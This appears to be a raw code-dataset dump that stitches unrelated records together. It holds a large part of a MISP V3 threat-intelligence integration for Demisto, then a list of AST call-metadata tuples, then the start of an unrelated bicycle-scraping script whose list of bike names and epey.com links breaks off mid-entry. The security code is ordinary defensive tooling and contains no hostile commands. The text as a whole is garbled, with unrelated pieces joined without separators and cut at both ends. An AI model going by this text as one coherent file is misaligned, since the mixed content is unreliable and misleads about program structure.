demisto_query def is_misp_complex_search_helper(match_operator, misp_query_params, operator_key): is_complex_search = False if match_operator is not None: misp_query_params[operator_key] = match_operator.group(2).split(',') is_complex_search = True return is_complex_search def prepare_args_to_search(controller): demisto_args = demisto.args() args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args} # Replacing keys and values from Demisto to Misp's keys if 'type' in args_to_misp_format: args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type') if 'to_ids' in args_to_misp_format: args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0 if 'from' in args_to_misp_format: args_to_misp_format['date_from'] = args_to_misp_format.pop('from') if 'to' in args_to_misp_format: args_to_misp_format['date_to'] = args_to_misp_format.pop('to') if 'event_id' in args_to_misp_format: args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id')) if 'last' in args_to_misp_format: args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last') if 'include_decay_score' in args_to_misp_format: args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0 if 'include_sightings' in args_to_misp_format: args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0 if 'include_correlations' in args_to_misp_format: args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0 if 'enforceWarninglist' in args_to_misp_format: args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0 if 'include_feed_correlations' in args_to_misp_format: args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get( 'include_feed_correlations') == 'true' else 0 args_to_misp_format.pop('include_feed_correlations') if 'limit' not in args_to_misp_format: args_to_misp_format['limit'] = '50' if 'tags' in args_to_misp_format: args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags']) args_to_misp_format['controller'] = controller demisto.debug(f"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}") return args_to_misp_format def build_attributes_search_response(response: Union[dict, requests.Response], include_correlations=False) -> dict: """ Convert the response of attribute search returned from MISP to the context output format. """ response_object = copy.deepcopy(response) if include_correlations: # return full related attributes only if the user wants to get them back ATTRIBUTE_FIELDS.append('RelatedAttribute') if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return get_limit_attribute_search_outputs(attributes) def get_limit_attribute_search_outputs(attributes): for i in range(len(attributes)): attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]} build_galaxy_output(attributes[i]) build_tag_output(attributes[i]) build_sighting_output_from_attribute_search_response(attributes[i]) convert_timestamp_to_readable(attributes[i], None) formatted_attributes = replace_keys_from_misp_to_context_data(attributes) return formatted_attributes def build_galaxy_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Galaxy'): given_object['Galaxy'] = [ { 'name': star.get('name'), 'type': star.get('type'), 'description': star.get('description') } for star in given_object['Galaxy'] ] def build_object_output(event): if event.get('Object'): event['Object'] = [ { 'name': event_object.get('name'), 'uuid': event_object.get('uuid'), 'description': event_object.get('description'), 'id': event_object.get('id') } for event_object in event['Object'] ] def build_tag_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Tag'): given_object['Tag'] = [ {'Name': tag.get('name'), 'is_galaxy': tag.get('is_galaxy') } for tag in given_object.get('Tag') ] def build_sighting_output_from_attribute_search_response(attribute): if attribute.get('Sighting'): attribute['Sighting'] = [ {'type': sighting.get('type') } for sighting in attribute.get('Sighting') ] def build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list: """returns list of attributes' values that match the search query when user set the arg 'compact' to True""" if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return [attribute.get('value') for attribute in attributes] def pagination_args_validation(page, limit): if page and page < 0: raise DemistoException("page should be zero or a positive number") if limit and limit < 0: raise DemistoException("limit should be zero or a positive number") def attribute_response_to_markdown_table(response: dict): attribute_highlights = [] for attribute in response: event = attribute.get('Event', {}) attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get( 'Tag') else None attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in attribute.get('Sighting')] if attribute.get('Sighting') else None attribute_highlights.append({ 'Attribute ID': attribute.get('ID'), 'Event ID': attribute.get('EventID'), 'Attribute Category': attribute.get('Category'), 'Attribute Type': attribute.get('Type'), 'Attribute Comment': attribute.get('Comment'), 'Attribute Value': attribute.get('Value'), 'Attribute Tags': attribute_tags, 'Attribute Sightings': attribute_sightings, 'To IDs': attribute.get('ToIDs'), 'Timestamp': attribute.get('Timestamp'), 'Event Info': event.get('Info'), 'Event Organization ID': event.get('OrganizationID'), 'Event Distribution': event.get('Distribution'), 'Event UUID': event.get('UUID') }) return attribute_highlights def search_attributes(demisto_args: dict) -> CommandResults: """Execute a MISP search over 'attributes'""" args = prepare_args_to_search('attributes') outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False)) include_correlations = argToBoolean(demisto_args.get('include_correlations', False)) page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: if outputs_should_include_only_values: response_for_context = build_attributes_search_response_return_only_values(response) number_of_results = len(response_for_context) md = tableToMarkdown(f"MISP search-attributes returned {number_of_results} attributes", response_for_context[:number_of_results], ["Value"]) else: response_for_context = build_attributes_search_response(response, include_correlations) attribute_highlights = attribute_response_to_markdown_table(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page} out others that may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-attributes returned {len(response_for_context)} attributes\n {pagination_message}", attribute_highlights, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Attribute", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No attributes found in MISP for the given filters: {args}") def build_events_search_response(response: Union[dict, requests.Response]) -> dict: """ Convert the response of event search returned from MISP to the context output format. please note: attributes are excluded from search-events output as the information is too big. User can use the command search-attributes in order to get the information about the attributes. """ response_object = copy.deepcopy(response) if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) events = [event.get('Event') for event in response_object] for i in range(0, len(events)): # Filter object from keys in event_args events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]} events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event build_galaxy_output(events[i]) build_tag_output(events[i]) build_object_output(events[i]) events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp')) events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp')) formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore return formatted_events # type: ignore def event_to_human_readable_tag_list(event): event_tags = event.get('Tag', []) if event_tags: return [tag.get('Name') for tag in event_tags] def event_to_human_readable_galaxy_list(event): event_galaxies = event.get('Galaxy', []) if event_galaxies: return [galaxy.get('Name') for galaxy in event.get('Galaxy')] def event_to_human_readable_object_list(event): event_objects = event.get('Object', []) if event_objects: return [event_object.get('ID') for event_object in event.get('Object')] def event_to_human_readable(response: dict): event_highlights = [] for event in response: event_tags = event_to_human_readable_tag_list(event) event_galaxies = event_to_human_readable_galaxy_list(event) event_objects = event_to_human_readable_object_list(event) event_highlights.append({ 'Event ID': event.get('ID'), 'Event Tags': event_tags, 'Event Galaxies': event_galaxies, 'Event Objects': event_objects, 'Publish Timestamp': event.get('PublishTimestamp'), 'Event Info': event.get('Info'), 'Event Org ID': event.get('OrganizationID'), 'Event Orgc ID': event.get('OwnerOrganization.ID'), 'Event Distribution': event.get('Distribution'), 'Event UUID': event.get('UUID'), }) return event_highlights def search_events(demisto_args: dict) -> CommandResults: """ Execute a MISP search using the 'event' controller. """ args = prepare_args_to_search('events') page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: response_for_context = build_events_search_response(response) event_outputs_to_human_readable = event_to_human_readable(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page} out others that may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-events returned {len(response_for_context)} events.\n {pagination_message}", event_outputs_to_human_readable, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Event", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No events found in MISP for the given filters: {args}") def delete_event(demisto_args: dict): """ Gets an event id and deletes it. """ event_id = demisto_args.get('event_id') response = PYMISP.delete_event(event_id) if 'errors' in response: raise DemistoException(f'Event ID: {event_id} has not found in MISP: \nError message: {response}') else: human_readable = f'Event {event_id} has been deleted' return CommandResults(readable_output=human_readable, raw_response=response) def add_tag(demisto_args: dict, is_attribute=False): """ Function will add tag to given UUID of event or attribute. is_attribute (bool): if the given UUID belongs to an attribute (True) or event (False). """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: PYMISP.tag(uuid, tag) # add the tag except PyMISPError: raise DemistoException("Adding the required tag was failed. Please make sure the UUID exists.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully added to attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully added to event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def remove_tag(demisto_args: dict, is_attribute=False): """ Function will remove tag to given UUID of event or attribute. is_attribute (bool): if the given UUID is an attribute's one. Otherwise it's event's. """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: response = PYMISP.untag(uuid, tag) if response and response.get('errors'): raise DemistoException(f'Error in `{demisto.command()}` command: {response}') except PyMISPError: raise DemistoException("Removing the required tag was failed. Please make sure the UUID and tag exist.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully removed from the event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def add_sighting(demisto_args: dict): """Adds sighting to MISP attribute """ attribute_id = demisto_args.get('id') attribute_uuid = demisto_args.get('uuid') sighting_type = demisto_args['type'] # mandatory arg att_id = attribute_id or attribute_uuid if not att_id: raise DemistoException('ID or UUID not specified') sighting_args = { 'id': attribute_id, 'uuid': attribute_uuid, 'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type] } sigh_obj = MISPSighting() sigh_obj.from_dict(**sighting_args) response = PYMISP.add_sighting(sigh_obj, att_id) if response.get('message'): raise DemistoException(f"An error was occurred: {response.get('message')}") elif response.get('Sighting'): human_readable = f'Sighting \'{sighting_type}\' has been successfully added to attribute {att_id}' return CommandResults(readable_output=human_readable) raise DemistoException(f"An error was occurred: {json.dumps(response)}") def test(malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ Test module. """ is_tag_list_valid(malicious_tag_ids) is_tag_list_valid(suspicious_tag_ids) if attributes_limit < 0: raise DemistoException('Attribute limit has to be a positive number.') response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json') if PYMISP._check_json_response(response): return 'ok' else: raise DemistoException('MISP has not connected.') def build_feed_url(demisto_args): url = demisto_args.get('feed') url = url[:-1] if url.endswith('/') else url if PREDEFINED_FEEDS.get(url): url = PREDEFINED_FEEDS[url].get('url') # type: ignore return url def add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict): """Gets an OSINT feed from url and publishing them to MISP urls with feeds for example: https://www.misp-project.org/feeds/ feed format must be MISP. """ headers = {'Accept': 'application/json'} url = build_feed_url(demisto_args) osint_url = f'{url}/manifest.json' limit = arg_to_number(demisto_args.get('limit', 2), "limit", required=True) try: uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json() events_ids = list() # type: List[Dict[str, int]] for index, uri in enumerate(uri_list, 1): response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json() misp_new_event = MISPEvent() misp_new_event.load(response) add_event_response = PYMISP.add_event(misp_new_event) event_object = add_event_response.get('Event') if event_object and 'id' in event_object: events_ids.append({'ID': event_object['id']}) if limit == len(events_ids): break human_readable = tableToMarkdown(f'Total of {len(events_ids)} events was added to MISP.', events_ids) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=events_ids, ) except ValueError as e: raise DemistoException(f'URL [{url}] is not a valid MISP feed. error: {e}') def add_object(event_id: str, obj: MISPObject): """Sending object to MISP and returning outputs Args: obj: object to add to MISP event_id: ID of event """ response = PYMISP.add_object(event_id, misp_object=obj) if 'errors' in response: raise DemistoException(f'Error in `{demisto.command()}` command: {response}') for ref in obj.ObjectReference: response = PYMISP.add_object_reference(ref) for attribute in response.get('Object', {}).get('Attribute', []): convert_timestamp_to_readable(attribute, None) response['Object']['timestamp'] = misp_convert_timestamp_to_date_string(response.get('Object', {}).get('timestamp')) formatted_response = replace_keys_from_misp_to_context_data(response) formatted_response.update({"ID": event_id}) human_readable = f'Object has been added to MISP event ID {event_id}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=formatted_response, ) def add_file_object(demisto_args: dict): entry_id = demisto_args.get('entry_id') event_id = demisto_args.get('event_id') file_path = demisto.getFilePath(entry_id).get('path') obj = FileObject(file_path) return add_object(event_id, obj) def add_domain_object(demisto_args: dict): """Adds a domain object to MISP domain-ip description: https://www.misp-project.org/objects.html#_domain_ip """ text = demisto_args.get('text') event_id = demisto_args.get('event_id') domain = demisto_args.get('name') obj = MISPObject('domain-ip') ips = argToList(demisto_args.get('ip')) for ip in ips: obj.add_attribute('ip', value=ip) obj.add_attribute('domain', value=domain) if text: obj.add_attribute('text', value=text) return add_object(event_id, obj) def add_url_object(demisto_args: dict): """Building url object in MISP scheme Scheme described https://www.misp-project.org/objects.html#_url """ url_args = [ 'text', 'last_seen', 'first_seen' ] event_id = demisto_args.get('event_id') url = demisto_args.get('url') url_parse = urlparse(url) url_obj = [{'url': url}] url_obj.extend({'scheme': url_parse.scheme}) if url_parse.scheme else None url_obj.append({'resource_path': url_parse.path}) if url_parse.path else None url_obj.append({'query_string': url_parse.query}) if url_parse.query else None url_obj.append({'domain': url_parse.netloc}) if url_parse.netloc else None url_obj.append({'fragment': url_parse.fragment}) if url_parse.fragment else None url_obj.append({'port': url_parse.port}) if url_parse.port else None url_obj.append( {'credential': (url_parse.username, url_parse.password)}) if url_parse.username and url_parse.password else None url_obj.extend(convert_arg_to_misp_args(demisto_args, url_args)) g_object = build_generic_object('url', url_obj) return add_object(event_id, g_object) def add_generic_object_command(demisto_args: dict): event_id = demisto_args.get('event_id') template = demisto_args.get('template') attributes = demisto_args.get('attributes').replace("'", '"') try: args = json.loads(attributes) if not isinstance(args, list): args = dict_to_generic_object_format(args) obj = build_generic_object(template, args) return add_object(event_id, obj) except ValueError as e: raise DemistoException( f'`attribute` parameter could not be decoded, may not a valid JSON\nattribute: {attributes}', str(e)) def convert_arg_to_misp_args(demisto_args, args_names): return [{arg.replace('_', '-'): demisto_args.get(arg)} for arg in args_names if demisto_args.get(arg)] def add_ip_object(demisto_args: dict): event_id = demisto_args.get('event_id') ip_object_args = [ 'dst_port', 'src_port', 'domain', 'hostname', 'ip_src', 'ip_dst' ] # converting args to MISP's arguments types misp_attributes_args = convert_arg_to_misp_args(demisto_args, ip_object_args) ips = argToList(demisto_args.get('ip')) for ip in ips: misp_attributes_args.append({'ip': ip}) if misp_attributes_args: non_req_args = [ 'first_seen', 'last_seen', ] misp_attributes_args.extend(convert_arg_to_misp_args(demisto_args, non_req_args)) misp_attributes_args.append({'text': demisto_args.get('comment')}) if demisto_args.get('comment') else None obj = build_generic_object('ip-port', misp_attributes_args) return add_object(event_id, obj) else: raise DemistoException( f'None of required arguments presents. command {demisto.command()} requires one of {ip_object_args}') def handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids): """ Gets 2 sets which include tag ids. If there is an id that exists in both sets, it will be removed from the suspicious tag ids set and will be stayed only in the malicious one (as a tag that was configured to be malicious is stronger than recognised as suspicious). """ common_ids = set(malicious_tag_ids) & set(suspicious_tag_ids) suspicious_tag_ids = {tag_id for tag_id in suspicious_tag_ids if tag_id not in common_ids} return malicious_tag_ids, suspicious_tag_ids def is_tag_list_valid(tag_ids): """Gets a list ot tag ids (each one is str), and verify all the tags are valid positive integers.""" for tag in tag_ids: try: tag = int(tag) if tag <= 0: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") except ValueError: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") def create_updated_attribute_instance(demisto_args: dict, attribute_uuid: str) -> MISPAttribute: attribute_type = demisto_args.get('type') distribution = demisto_args.get('distribution') category = demisto_args.get('category') comment = demisto_args.get('comment') value = demisto_args.get('value') first_seen = demisto_args.get('first_seen') last_seen = demisto_args.get('last_seen') attribute_instance = MISPAttribute() attribute_instance.uuid = attribute_uuid if attribute_type: attribute_instance.type = attribute_type if distribution: attribute_instance.distribution = MISP_DISTRIBUTION_TO_IDS[distribution] if category: attribute_instance.category = category if value: attribute_instance.value = value if comment: attribute_instance.comment = comment if first_seen: attribute_instance.first_seen = first_seen if last_seen: attribute_instance.last_seen = last_seen return attribute_instance def update_attribute_command(demisto_args: dict) -> CommandResults: attribute_uuid = demisto_args.get('attribute_uuid') attribute_instance = create_updated_attribute_instance(demisto_args, attribute_uuid) attribute_instance_response = PYMISP.update_attribute(attribute=attribute_instance, attribute_id=attribute_uuid) if isinstance(attribute_instance_response, dict) and attribute_instance_response.get('errors'): raise DemistoException(attribute_instance_response.get('errors')) human_readable = f"## MISP update attribute\nAttribute: {attribute_uuid} was updated.\n" attribute = attribute_instance_response.get('Attribute') convert_timestamp_to_readable(attribute, None) parsed_attribute_data = replace_keys_from_misp_to_context_data(attribute) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=parsed_attribute_data, ) def main(): params = demisto.params() malicious_tag_ids = argToList(params.get('malicious_tag_ids')) suspicious_tag_ids = argToList(params.get('suspicious_tag_ids')) reliability = params.get('integrationReliability', 'B - Usually reliable') if DBotScoreReliability.is_valid_type(reliability): reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) else: Exception("MISP V3 error: Please provide a valid value for the Source Reliability parameter") attributes_limit = arg_to_number(params.get('attributes_limit', 20), "attributes_limit", required=True) command = demisto.command() demisto.debug(f'[MISP V3]: command is {command}') args = demisto.args() try: malicious_tag_ids, suspicious_tag_ids = handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids) if command == 'test-module': return_results(test(malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, attributes_limit=attributes_limit)) elif command == 'misp-create-event': return_results(create_event_command(args)) elif command == 'misp-add-attribute': return_results(add_attribute(demisto_args=args)) elif command == 'misp-search-events': return_results(search_events(args)) elif command == 'misp-search-attributes': return_results(search_attributes(args)) elif command == 'misp-delete-event': return_results(delete_event(args)) elif command == 'misp-add-sighting': return_results(add_sighting(args)) elif command == 'misp-add-tag-to-event': return_results(add_tag(args)) elif command == 'misp-add-tag-to-attribute': return_results(add_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-remove-tag-from-event': return_results(remove_tag(args)) elif command == 'misp-remove-tag-from-attribute': return_results(remove_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-add-events-from-feed': return_results(add_events_from_feed(demisto_args=args, use_ssl=VERIFY, proxies=PROXIES)) elif command == 'file': return_results( generic_reputation_command(args, 'file', 'FILE', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'url': return_results( generic_reputation_command(args, 'url', 'URL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'ip': return_results( generic_reputation_command(args, 'ip', 'IP', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'domain': return_results( generic_reputation_command(args, 'domain', 'DOMAIN', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'email': return_results(generic_reputation_command(args, 'email', 'EMAIL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'misp-add-file-object': return_results(add_file_object(args)) elif command == 'misp-add-domain-object': return_results(add_domain_object(args)) elif command == 'misp-add-url-object': return_results(add_url_object(args)) elif command == 'misp-add-ip-object': return_results(add_ip_object(args)) elif command == 'misp-add-object': return_results(add_generic_object_command(args)) elif command == 'misp-update-attribute': return_results(update_attribute_command(args)) except PyMISPError as e: return_error(e.message) except Exception as e: return_error(str(e)) if __name__ in ['__main__', '__builtin__', 'builtins']: main()
[((37, 0, 37, 26), 'urllib3.disable_warnings', 'urllib3.disable_warnings', ({}, {}), '()', False, 'import urllib3\n'), ((50, 13, 50, 88), 'pymisp.ExpandedPyMISP', 'ExpandedPyMISP', (), '', False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((294, 18, 294, 55), 'pymisp.tools.GenericObjectGenerator', 'GenericObjectGenerator', ({(294, 41, 294, 54): 'template_name'}, {}), '(template_name)', False, 'from pymisp.tools import GenericObjectGenerator\n'), ((396, 15, 396, 43), 'copy.deepcopy', 'copy.deepcopy', ({(396, 29, 396, 42): 'misp_response'}, {}), '(misp_response)', False, 'import copy\n'), ((494, 12, 494, 23), 'pymisp.MISPEvent', 'MISPEvent', ({}, {}), '()', False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((820, 22, 820, 45), 'copy.deepcopy', 'copy.deepcopy', ({(820, 36, 820, 44): 'response'}, {}), '(response)', False, 'import copy\n'), ((972, 22, 972, 45), 'copy.deepcopy', 'copy.deepcopy', ({(972, 36, 972, 44): 'response'}, {}), '(response)', False, 'import copy\n'), ((1160, 15, 1160, 29), 'pymisp.MISPSighting', 'MISPSighting', ({}, {}), '()', False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((1258, 10, 1258, 31), 'pymisp.tools.FileObject', 'FileObject', ({(1258, 21, 1258, 30): 'file_path'}, {}), '(file_path)', False, 'from pymisp.tools import FileObject\n'), ((1269, 10, 1269, 33), 'pymisp.MISPObject', 'MISPObject', ({(1269, 21, 1269, 32): '"""domain-ip"""'}, {}), "('domain-ip')", False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((1290, 16, 1290, 29), 'urllib.parse.urlparse', 'urlparse', ({(1290, 25, 1290, 28): 'url'}, {}), '(url)', False, 'from urllib.parse import urlparse\n'), ((1385, 25, 1385, 40), 'pymisp.MISPAttribute', 'MISPAttribute', ({}, {}), '()', False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((1208, 29, 1208, 40), 'pymisp.MISPEvent', 'MISPEvent', ({}, {}), '()', False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n')]
fusuyfusuy/School-Projects
pycle/bicycle-scrapes/epey-scrape/downLink5.py
8e38f19da90f63ac9c9ec91e550fc5aaab3d0234
from bs4 import BeautifulSoup import os import wget from urllib.request import Request, urlopen bicycles=[{'name': 'Kron XC150 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc150-27-5-hd.html'}, {'name': 'Corelli Trivor 3 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-trivor-3-0.html'}, {'name': 'Salcano Hector 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-hector-26-v.html'}, {'name': 'Corelli Atrox 3.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-atrox-3-2.html'}, {'name': 'Mosso WildFire LTD HYD 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-wildfire-hyd-27-5.html'}, {'name': 'Corelli Via 1.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-via-1-2.html'}, {'name': 'Kron FD 1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-fd-1000.html'}, {'name': 'Bisan CTS 5200 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bisan-cts-5200.html'}, {'name': 'Kron XC100 26 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc100-26-md.html'}, {'name': 'Bisan SPX-3250 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bisan-spx-3250.html'}, {'name': 'Kron RC1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-rc1000.html'}, {'name': 'Carraro E-Viva Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-e-viva.html'}, {'name': 'Kron Ares 4.0 26 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-ares-4-0-26-md.html'}, {'name': 'Carraro Monster 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-monster-16.html'}, {'name': 'Salcano Helen 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-helen-26.html'}, {'name': 'Bianchi RCX 527 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-rcx-527-27-5.html'}, {'name': 'RKS TNT5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/rks-tnt5.html'}, {'name': 'Corelli Via Lady 1.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-via-lady-1-1.html'}, {'name': 'Corelli Snoop 3.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-snoop-3-0.html'}, {'name': 'Corelli Dolce 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-dolce-2-0.html'}, {'name': 'Corelli Neon 2.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-neon-2-1.html'}, {'name': 'Kron CX100 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-cx100-man.html'}, {'name': 'Bianchi Aspid 27 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-aspid-27.html'}, {'name': 'Salcano İzmir Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-izmir.html'}, {'name': 'Ümit 2610 Alanya Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2610-alanya.html'}, {'name': 'Kross Trans 5.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kross-trans-5-0.html'}, {'name': 'Kron ETX500 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-etx500.html'}, {'name': 'Salcano Attack 14 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-attack-14.html'}, {'name': 'Corelli Banner Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-banner.html'}, {'name': 'Corelli Voras 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-voras-1-0.html'}, {'name': 'Peugeot JM244 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-jm244.html'}, {'name': 'Corelli Smile 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-smile-20.html'}, {'name': 'Carraro Buffalo 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-buffalo-20.html'}, {'name': 'Carraro Elite 804 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-elite-804.html'}, {'name': 'Ümit 1605 Little Pony Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-1605-little-pony.html'}, {'name': 'Ümit 2400 Colorado Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2400-colorado.html'}, {'name': 'Kron CX50 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-cx50-26-v.html'}, {'name': 'Corelli Beauty 2.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-beauty-2-1.html'}, {'name': 'Corelli Snoop 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-snoop-2-2.html'}, {'name': 'Corelli Evol 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-evol-2-0.html'}, {'name': 'Salcano Excel 24 Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-excel-24-lady.html'}, {'name': 'Corelli Apenin 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-apenin-1-0.html'}, {'name': 'Orbis Voltage 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-voltage-26.html'}, {'name': 'Mosso Groovy 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-groovy-29.html'}, {'name': 'Bianchi Aspid 36 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-aspid-36.html'}, {'name': 'Ümit 2864 Magnetic V Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2864-magnetic-v-lady.html'}, {'name': 'Cannondale F SI AL 3 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-f-si-al-3-27-5.html'}, {'name': 'Salcano Bodrum 26 Man 